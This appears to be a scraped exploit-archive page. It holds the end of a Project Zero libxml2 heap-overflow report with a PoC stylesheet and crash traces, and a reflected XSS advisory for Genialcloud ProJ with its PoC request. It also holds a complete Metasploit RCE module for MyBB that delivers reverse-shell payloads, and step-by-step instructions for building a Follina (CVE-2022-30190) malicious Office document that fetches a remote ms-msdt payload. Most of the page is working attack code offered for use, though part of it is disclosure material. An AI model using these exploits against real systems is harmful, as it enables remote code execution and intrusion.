byte legend (one shadow byte represents 8 application bytes):<br /> Addressable: 00<br /> Partially addressable: 01 02 03 04 05 06 07<br /> Heap left redzone: fa<br /> Freed heap region: fd<br /> Stack left redzone: f1<br /> Stack mid redzone: f2<br /> Stack right redzone: f3<br /> Stack after return: f5<br /> Stack use after scope: f8<br /> Global redzone: f9<br /> Global init order: f6<br /> Poisoned by user: f7<br /> Container overflow: fc<br /> Array cookie: ac<br /> Intra object redzone: bb<br /> ASan internal: fe<br /> Left alloca redzone: ca<br /> Right alloca redzone: cb<br />==93182==ABORTING<br />```<br /><br /><br />XSLT version (no XML_PARSE_HUGE needed)<br />```<br /><?xml version=\"1.0\"?><br /><test-cases><br /> <test-case length=\"2048\">A</test-case><br /></test-cases><br /><br />\u221a fwilhelm2 libxslt % cat poc.xslt<br /><?xml version=\"1.0\"?><br /><xsl:stylesheet version=\"1.0\"<br /> xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"<br /> xmlns:str=\"http://exslt.org/strings\"<br />xmlns:exsl=\"http://exslt.org/common\"<br /> exclude-result-prefixes=\"str\"><br /><br /><xsl:output indent=\"yes\"/><br /><br /><xsl:template match=\"test-cases\"><br /> <test-results><br /> <xsl:apply-templates select=\"test-case\"/><br /> </test-results><br /></xsl:template><br /><br /><xsl:template match=\"test-case\"><br /> <test-result><br /> <xsl:variable name=\"padding\"><br /> <xsl:value-of select=\"str:padding(@length)\"/><br /> </xsl:variable><br /> <xsl:variable name=\"l1\"><br /> <xsl:value-of select=\"concat($padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding,$padding)\"/><br /> </xsl:variable><br /> <xsl:variable name=\"l2\"><br /> <xsl:value-of select=\"concat($l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1,$l1)\"/><br /> </xsl:variable><br /> <xsl:variable name=\"l3\"><br /> <xsl:value-of select=\"concat($l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2,$l2)\"/><br /> </xsl:variable><br /> <xsl:variable name=\"l4\"><br /> <xsl:value-of select=\"concat($l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3,$l3)\"/><br /> </xsl:variable><br /> <xsl:variable name=\"l5\"><br /> <xsl:value-of select=\"concat($l4,$l4,$l4,$l4,$l4,$l4,$l4,$l4)\"/><br /> </xsl:variable><br /> <xsl:variable name=\"temp\"><br /> <a><xsl:copy-of select=\"$l5\"/></a><br /> <a><xsl:copy-of select=\"$l5\"/></a><br /> <a><xsl:copy-of select=\"$l5\"/></a><br /> <a><xsl:copy-of select=\"$l5\"/></a><br /> </xsl:variable><br /> <foo><br /> <xsl:value-of select=\"string-length($temp)\"/><br /> </foo><br /> </test-result><br /></xsl:template><br /></xsl:stylesheet><br /><br />\u221a fwilhelm2 libxslt % ./xsltproc/xsltproc poc.xslt poc.xml<br />=================================================================<br />==244487==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fe4cc4ee80c at pc 0x0000004b37d2 bp 0x7ffd8a145aa0 sp 0x7ffd8a145268<br />WRITE of size 1073741824 at 0x7fe4cc4ee80c thread T0<br /> #0 0x4b37d1 in __asan_memmove (/usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc+0x4b37d1)<br /> #1 0x884dc1 in xmlBufAdd /usr/local/google/home/fwilhelm/code/libxml2/buf.c:908:5<br /> #2 0x6dadae in xmlBufGetNodeContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c:5452:33<br /> #3 0x6dac8a in xmlBufGetNodeContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c:5548:7<br /> #4 0x6db62f in xmlNodeGetContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c<br /> #5 0x7c80fc in xmlXPathCastNodeToString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:5713:16<br /> #6 0x7c80fc in xmlXPathCastNodeSetToString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:5733:12<br /> #7 0x7dc654 in xmlXPathCacheConvertString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:2698:8<br /> #8 0x7decca in xmlXPathStringFunction /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:8906:21<br /> #9 0x7df931 in xmlXPathStringLengthFunction /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:8941:5<br /> #10 0x80c5e9 in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13219:17<br /> #11 0x808653 in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13363:26<br /> #12 0x7ee321 in xmlXPathRunEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13956:2<br /> #13 0x7ece3c in xmlXPathCompiledEvalInternal /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:14339:11<br /> #14 0x7eca34 in xmlXPathCompiledEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:14385:5<br /> #15 0x588140 in xsltPreCompEval /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:385:11<br /> #16 0x589ba5 in xsltValueOf /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:4541:11<br /> #17 0x578704 in xsltApplySequenceConstructor /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2757:17<br /> #18 0x5754d0 in xsltApplyXSLTTemplate /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:3215:5<br /> #19 0x570899 in xsltProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2167:2<br /> #20 0x58cbbc in xsltApplyTemplates /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:5095:2<br /> #21 0x578704 in xsltApplySequenceConstructor /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2757:17<br /> #22 0x5754d0 in xsltApplyXSLTTemplate /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:3215:5<br /> #23 0x570899 in xsltProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2167:2<br /> #24 0x57199f in xsltDefaultProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:1997:3<br /> #25 0x570b62 in xsltProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2129:2<br /> #26 0x593919 in xsltApplyStylesheetInternal /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:5987:5<br /> #27 0x4eb14a in xsltProcess /usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc.c<br /> #28 0x4e8cf5 in main /usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc.c:935:6<br /> #29 0x7fe6fc94f7ec in __libc_start_main csu/../csu/libc-start.c:332:16<br /> #30 0x437759 in _start (/usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc+0x437759)<br /><br />0x7fe4cc4ee80c is located 0 bytes to the right of 3221225484-byte region [0x7fe40c4ee800,0x7fe4cc4ee80c)<br />allocated by thread T0 here:<br /> #0 0x4b4203 in __interceptor_realloc (/usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc+0x4b4203)<br /> #1 0x8842e0 in xmlBufResize /usr/local/google/home/fwilhelm/code/libxml2/buf.c:829:26<br /> #2 0x884d30 in xmlBufAdd /usr/local/google/home/fwilhelm/code/libxml2/buf.c:902:14<br /> #3 0x6dadae in xmlBufGetNodeContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c:5452:33<br /> #4 0x6dac8a in xmlBufGetNodeContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c:5548:7<br /> #5 0x6db62f in xmlNodeGetContent /usr/local/google/home/fwilhelm/code/libxml2/tree.c<br /> #6 0x7c80fc in xmlXPathCastNodeToString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:5713:16<br /> #7 0x7c80fc in xmlXPathCastNodeSetToString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:5733:12<br /> #8 0x7dc654 in xmlXPathCacheConvertString /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:2698:8<br /> #9 0x7decca in xmlXPathStringFunction /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:8906:21<br /> #10 0x7df931 in xmlXPathStringLengthFunction /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:8941:5<br /> #11 0x80c5e9 in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13219:17<br /> #12 0x808653 in xmlXPathCompOpEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13363:26<br /> #13 0x7ee321 in xmlXPathRunEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:13956:2<br /> #14 0x7ece3c in xmlXPathCompiledEvalInternal /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:14339:11<br /> #15 0x7eca34 in xmlXPathCompiledEval /usr/local/google/home/fwilhelm/code/libxml2/xpath.c:14385:5<br /> #16 0x588140 in xsltPreCompEval /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:385:11<br /> #17 0x589ba5 in xsltValueOf /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:4541:11<br /> #18 0x578704 in xsltApplySequenceConstructor /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2757:17<br /> #19 0x5754d0 in xsltApplyXSLTTemplate /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:3215:5<br /> #20 0x570899 in xsltProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2167:2<br /> #21 0x58cbbc in xsltApplyTemplates /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:5095:2<br /> #22 0x578704 in xsltApplySequenceConstructor /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2757:17<br /> #23 0x5754d0 in xsltApplyXSLTTemplate /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:3215:5<br /> #24 0x570899 in xsltProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2167:2<br /> #25 0x57199f in xsltDefaultProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:1997:3<br /> #26 0x570b62 in xsltProcessOneNode /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:2129:2<br /> #27 0x593919 in xsltApplyStylesheetInternal /usr/local/google/home/fwilhelm/code/libxslt/libxslt/transform.c:5987:5<br /> #28 0x4eb14a in xsltProcess /usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc.c<br /> #29 0x4e8cf5 in main /usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc.c:935:6<br /> #30 0x7fe6fc94f7ec in __libc_start_main csu/../csu/libc-start.c:332:16<br /><br />SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/local/google/home/fwilhelm/code/libxslt/xsltproc/xsltproc+0x4b37d1) in __asan_memmove<br />Shadow bytes around the buggy address:<br /> 0x0ffd19895cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br /> 0x0ffd19895cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br /> 0x0ffd19895cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br /> 0x0ffd19895ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br /> 0x0ffd19895cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br />=>0x0ffd19895d00: 00[04]fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br /> 0x0ffd19895d10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br /> 0x0ffd19895d20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br /> 0x0ffd19895d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br /> 0x0ffd19895d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br /> 0x0ffd19895d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br />Shadow byte legend (one shadow byte represents 8 application bytes):<br /> Addressable: 00<br /> Partially addressable: 01 02 03 04 05 06 07<br /> Heap left redzone: fa<br /> Freed heap region: fd<br /> Stack left redzone: f1<br /> Stack mid redzone: f2<br /> Stack right redzone: f3<br /> Stack after return: f5<br /> Stack use after scope: f8<br /> Global redzone: f9<br /> Global init order: f6<br /> Poisoned by user: f7<br /> Container overflow: fc<br /> Array cookie: ac<br /> Intra object redzone: bb<br /> ASan internal: fe<br /> Left alloca redzone: ca<br /> Right alloca redzone: cb<br />==244487==ABORTING<br />```<br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. **The scheduled deadline is 2022-06-06**. <br />For more details, see the Project Zero vulnerability disclosure policy: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html<br /><br />Related CVE Numbers: CVE-2022-29824.<br /><br /><br /><br />Found by: fwilhelm@google.com<br /><br /></code></pre>
<pre><code># Exploit Title: Avantune Genialcloud ProJ 10 - Reflected XSS (Cross-Site Scripting)<br /># Date: 2022-06-01<br /># Exploit Author: Andrea Intilangelo<br /># Vendor Homepage: https://www.avantune.com<br /># Software Link: https://www.genialcloud.com - https://www.genialcloud.com/discover-genialcloud-proj - https://store.genialcloud.com<br /># Version: 10<br /># Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 100.0, Microsoft Edge 101.0.1210.39)<br /># CVE: CVE-2022-29296<br /><br /><br />Reflected Cross-Site Scripting (XSS) vulnerability in login-portal webpage of Genialcloud ProJ (and potentially in other platforms from the<br />same software house "Avantune" since codebase seems shared with their other products: Facsys and Analysis) allows remote attacker to inject<br />and execute arbitrary web scripts or HTML via a crafted payload.<br /><br />Request parameters affected is "msg".<br /><br />PoC Request:<br />GET /eportal/?nologon=1&msg=Invalid%20username%20or%20password%27%3Balert%28%22y0%21+XSS+here+%3A%29%22%29%2F%2F HTTP/1.1<br />Host: [REDACTED]<br />Cookie: ASP.NET_SessionId=3recnmmlpo1glzzyejdoezk2<br />Upgrade-Insecure-Requests: 1<br />Accept-Encoding: gzip, deflate<br />Accept: */*<br />Accept-Language: en-US,en-GB;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br /><br />PoC Response:<br />HTTP/1.1 200 OK<br />Cache-Control: private<br />Content-Type: text/html; charset=utf-8<br />Server: Microsoft-IIS/10.0<br />X-AspNet-Version: 4.0.30319<br />X-Powered-By: ASP.NET<br />Date: Wed, 11 May 2022 10:51:10 GMT<br />Connection: close<br />Content-Length: 8162<br /><br /><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><br /><br /><html xmlns="http://www.w3.org/1999/xhtml"><br /><head><link rel="stylesheet"<br />...[SNIP]...<br /><script type="text/javascript"> var Msg = 'Invalid username or password';alert("y0! XSS here :)")//';</script><br />...[SNIP]...<br /><br /><br />Timeline:<br /><br />2022-01-05: Vulnerability discovered.<br />2022-01-06: Vendor contacted.<br />2022-02-07: No reply, vendor contacted for 2nd time.<br />2022-02-10: Request for CVE reservation.<br />2022-04-16: Assigned CVE number CVE-2022-29296.<br />2022-05-07: No reply, vendor contacted for 3rd time.<br />2022-06-01: Public disclosure.<br /><br /><br />PoC Screenshots:<br /><br />https://imagebin.ca/v/6j86ekMqKZD8<br />https://postimg.cc/XXv6YbK9<br /><br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::Powershell<br /> include Msf::Exploit::CmdStager<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'MyBB Admin Control Code Injection RCE',<br /> 'Description' => %q{<br /> This exploit module leverages an improper input validation<br /> vulnerability in MyBB prior to `1.8.30` to execute arbitrary code in<br /> the context of the user running the application.<br /><br /> MyBB Admin Control setting page calls PHP `eval` function with an<br /> unsanitized user input. The exploit adds a new setting, injecting the<br /> payload in the vulnerable field, and triggers its execution with a<br /> second request. Finally, it takes care of cleaning up and removes the<br /> setting.<br /><br /> Note that authentication is required for this exploit to work and the<br /> account must have rights to add or update settings (typically, myBB<br /> administrator role).<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Cillian Collins', # vulnerability research<br /> 'Altelus', # original PoC<br /> 'Christophe De La Fuente' # MSF module<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://github.com/mybb/mybb/security/advisories/GHSA-876v-gwgh-w57f'],<br /> [ 'URL', 'https://www.zerodayinitiative.com/advisories/ZDI-22-503/'],<br /> [ 'URL', 'https://github.com/Altelus1/CVE-2022-24734'],<br /> [ 'CVE', '2022-24734']<br /> ],<br /> 'Platform' => %w[php unix linux win],<br /> 'Privileged' => false,<br /> 'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Targets' => [<br /> [<br /> 'PHP',<br /> {<br /> 'Platform' => 'php',<br /> 'Arch' => ARCH_PHP,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' },<br /> 'Type' => :in_memory<br /> }<br /> ],<br /> [<br /> 'Unix (In-Memory)',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_php_ssl' },<br /> 'Type' => :in_memory<br /> }<br /> ],<br /> [<br /> 'Linux (Dropper)',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },<br /> 'Type' => :dropper<br /> }<br /> ],<br /> [<br /> 'Windows (In-Memory)',<br /> {<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_CMD,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/meterpreter/reverse_tcp' },<br /> 'Type' => :in_memory<br /> }<br /> ],<br /> [<br /> 'Windows (Dropper)',<br /> {<br /> 'Platform' => 'win',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' },<br /> 'Type' => :dropper<br /> }<br /> ]<br /> ],<br /> 'DisclosureDate' => '2022-03-09',<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [CONFIG_CHANGES, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('USERNAME', [ true, 'MyBB Admin CP username' ]),<br /> OptString.new('PASSWORD', [ true, 'MyBB Admin CP password' ]),<br /> OptString.new('TARGETURI', [ true, 'The URI of the MyBB application', '/'])<br /> ]<br /> )<br /> end<br /><br /> def check<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'index.php'),<br /> 'method' => 'GET',<br /> 'vars_get' => { 'intcheck' => 1 }<br /> })<br /> return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?<br /> return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200<br /><br /> # see https://github.com/mybb/mybb/blob/feature/inc/class_core.php#L307-L310<br /> unless res.body.include?('MYBB')<br /> return CheckCode::Unknown("#{peer} - Cannot find MyBB forum running at #{target_uri.path}")<br /> end<br /><br /> print_good("MyBB forum found running at #{target_uri.path}")<br /><br /> return CheckCode::Detected<br /> end<br /><br /> def login<br /> vprint_status('Attempting login')<br /><br /> cookie_jar.cleanup(true)<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, '/admin/index.php'),<br /> 'method' => 'POST',<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> 'username' => datastore['USERNAME'],<br /> 'password' => datastore['PASSWORD'],<br /> 'do' => 'login'<br /> }<br /> })<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?<br /> unless res.body.match(/Logged in as .*#{datastore['USERNAME']}/)<br /> fail_with(Failure::NoAccess, "#{peer} - Invalid credentials")<br /> end<br /><br /> print_good('Login successful!')<br /> end<br /><br /> def send_config_settings(method: 'GET', action: 'add', vars_get: {}, vars_post: {}, check_response: true)<br /> req_hash = {<br /> 'uri' => normalize_uri(target_uri.path, '/admin/index.php'),<br /> 'method' => method,<br /> 'vars_get' => {<br /> 'module' => 'config-settings',<br /> 'action' => action<br /> }.merge(vars_get)<br /> }<br /> req_hash['vars_post'] = vars_post unless vars_post.blank?<br /> res = send_request_cgi(req_hash, datastore['WfsDelay'] > 0 ? datastore['WfsDelay'] : 2)<br /> if check_response && res.nil?<br /> fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response")<br /> end<br /> res<br /> end<br /><br /> def exploit<br /> login<br /><br /> res = send_config_settings<br /> if res.body.include?('Access Denied')<br /> fail_with(Failure::NoAccess, "#{peer} - Supplied user doesn't have the rights to add a setting")<br /> end<br /><br /> vprint_status('Adding a malicious settings')<br /> doc = res.get_html_document<br /> @my_post_key = doc.xpath('//input[@name="my_post_key"]/@value').text<br /><br /> case target['Type']<br /> when :in_memory<br /> execute_command(payload.encoded)<br /> when :dropper<br /> execute_cmdstager<br /> end<br /> end<br /><br /> def send_payload(cmd)<br /> vprint_status('Adding a crafted configuration setting entry with the payload')<br /><br /> cmd = cmd.gsub(/\\/, '\\' => '\\\\')<br /> cmd = cmd.gsub(/"/, '"' => '\\"')<br /> cmd = cmd.gsub(/\$/, '$' => '\\$')<br /><br /> case target['Platform']<br /> when 'php'<br /> extra = "\" . eval(\"#{cmd}\") .\""<br /> when 'win'<br /> if target['Arch'] == ARCH_CMD<br /> # Force cmd to run in the background (only works for `cmd`)<br /> extra = "\" . pclose(popen(\"start /B #{cmd}\", \"r\")) .\""<br /> else<br /> extra = "\" . system(\"#{cmd}\") .\""<br /> end<br /> else<br /> extra = "\" . system(\"#{cmd} > /dev/null &\") .\""<br /> end<br /><br /> post_data = {<br /> my_post_key: @my_post_key,<br /> title: Rex::Text.rand_text_alpha(rand(8...16)),<br /> description: Rex::Text.rand_text_alpha(rand(8...16)),<br /> gid: 1,<br /> disporder: '',<br /> name: Rex::Text.rand_text_alpha(rand(8...16)),<br /> type: "\tphp",<br /> extra: extra,<br /> value: Rex::Text.rand_text_alpha(rand(8...16))<br /> }<br /><br /> res = send_config_settings(method: 'POST', vars_post: post_data)<br /> unless res.code == 302<br /> doc = res.get_html_document<br /> err = doc.xpath('//div[@class="error"]').text<br /> fail_with(Failure::Unknown,<br /> "#{peer} - The module expected a 302 response but received: "\<br /> "#{res.code}. Exploit didn't work.#{" Reason: #{err}" if err.present?}")<br /> end<br /><br /> vprint_good('Payload successfully sent')<br /> end<br /><br /> def trigger_payload<br /> vprint_status('Triggering the payload execution')<br /> # We're not expecting response to this query<br /> send_config_settings(action: 'change', check_response: false)<br /> end<br /><br /> def remove_setting<br /> vprint_status('Removing the configuration setting')<br /><br /> vprint_status('Grab the delete parameters')<br /> res = send_config_settings(action: 'manage')<br /> if res.body.include?('<title>MyBB Control Panel - Login</title>')<br /> # this exploit seems to logout users sometimes, so, try to login again and retry<br /> print_status('User session is not valid anymore. Trying to login again to cleanup')<br /> login<br /> res = send_config_settings(action: 'manage')<br /> end<br /><br /> doc = res.get_html_document<br /> control_links = doc.xpath('//div[@class="popup_item_container"]/a/@href')<br /> uri = control_links.detect do |href|<br /> href.text.include?('action=delete') && href.text.include?("my_post_key=#{@my_post_key}")<br /> end<br /> if uri.nil?<br /> print_warning("#{peer} - URI not found in `Modify Settings` page - cannot cleanup")<br /> return<br /> end<br /><br /> vprint_status('Send the delete request')<br /> params = uri.text.split('?')[1]<br /> get_data = CGI.parse(params).transform_values(&:join)<br /> send_config_settings(method: 'POST', vars_get: get_data)<br /> end<br /><br /> def execute_command(cmd, _opt = {})<br /> send_payload(cmd)<br /> trigger_payload<br /> remove_setting<br /> print_status('Shell incoming...')<br /> end<br />end<br /></code></pre>
<pre><code># POC CVE-2022-30190 : CVE 0-day MS Offic RCE aka msdt follina <br /><br />> Info : [New Microsoft Office zero-day used in attacks to execute PowerShell](https://www.bleepingcomputer.com/news/security/new-microsoft-office-zero-day-used-in-attacks-to-execute-powershell/)<br /><br />## Summary <br /><br />On the 29th of May 2022, the Nao_Sec team, an independent Cyber Security Research<br />Team, discovered a malicious Office document shared on Virustotal. This document is<br />using an unusual, but known scheme to infect its victims. The scheme was not detected as<br />malicious by some EDR, like Microsoft Defender for Endpoint. This vulnerability could lead to<br />code execution without the need of user interaction, as it does not involve macros, except if the<br />Protected View mode is enabled. There is no CVE number attributed yet.<br /><br /><br />## Technical Details<br /><br />The vulnerability is being exploited by using the MSProtocol URI scheme to load some code.<br />Attackers could embed malicious links inside Microsoft Office documents, templates or emails<br />beginning with ms-msdt: that will be loaded and executed afterward without user interaction<br />- except if the Protected View mode is enabled. Nevertheless, converting the document to<br />the RTF format could also bypass the Protected View feature.<br /><br />## Proof of Concept <br /><br />MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).<br /><br />The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).<br /><br />Here are the steps to build a Proof-of-Concept docx:<br /><br />1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.<br /><br />2. Edit `word/_rels/document.xml.rels` in the docx structure (it is a plain zip). Modify the XML tag `<Relationship>` with attribute<br /><br />```<br />Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"<br />```<br /><br />and `Target="embeddings/oleObject1.bin"` by changing the `Target` value and adding attribute `TargetMode`:<br /><br />```<br />Target = "http://<payload_server>/payload.html!"<br />TargetMode = "External"<br />```<br /><br />Note the Id value (probably it is "rId5").<br /><br />3. Edit `word/document.xml`. Search for the "<o:OLEObject ..>" tag (with `r:id="rId5"`) and change the attribute from `Type="Embed"` to `Type="Link"` and add the attribute `UpdateMode="OnCall"`.<br /><br />NOTE: The created malicious docx is almost the same as for [CVE-2021-44444](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444).<br /><br />4. Serve the PoC (calc.exe launcher) html payload with the ms-msdt scheme at `http://<payload_server>/payload.html`:<br /><br />```<br /><!doctype html><br /><html lang="en"><br /><body><br /><script><br />//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times<br /> window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \"";<br /></script><br /><br /></body><br /></html><br />```<br /><br />Note that the comment line with AAA should be repeated >60 times (for filling up enough space to trigger the payload for some reason).<br /><br />## BONUS (0-click RTF version)<br /><br />If you also add these elements under the `<o:OLEObject>` element in `word/document.xml` at step 3:<br /><br />```<br /><o:LinkType>EnhancedMetaFile</o:LinkType><br /><o:LockedField>false</o:LockedField><br /><o:FieldCodes>\f 0</o:FieldCodes><br />```<br /><br />then it'll work as RTF also (open the resulting docx and save it as RTF).<br /><br />With RTF, there is no need to open the file in Word, it is enough to browse to the file and have a look at it in a preview pane. The preview pane triggers the external HTML payload and RCE is there without any clicks.<br /><br />## Sources :<br /><br />- https://nao-sec.org/about<br />- https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection<br />- https://gist.github.com/tothi/66290a42896a97920055e50128c9f040<br />- https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/<br /><br /><br /></code></pre>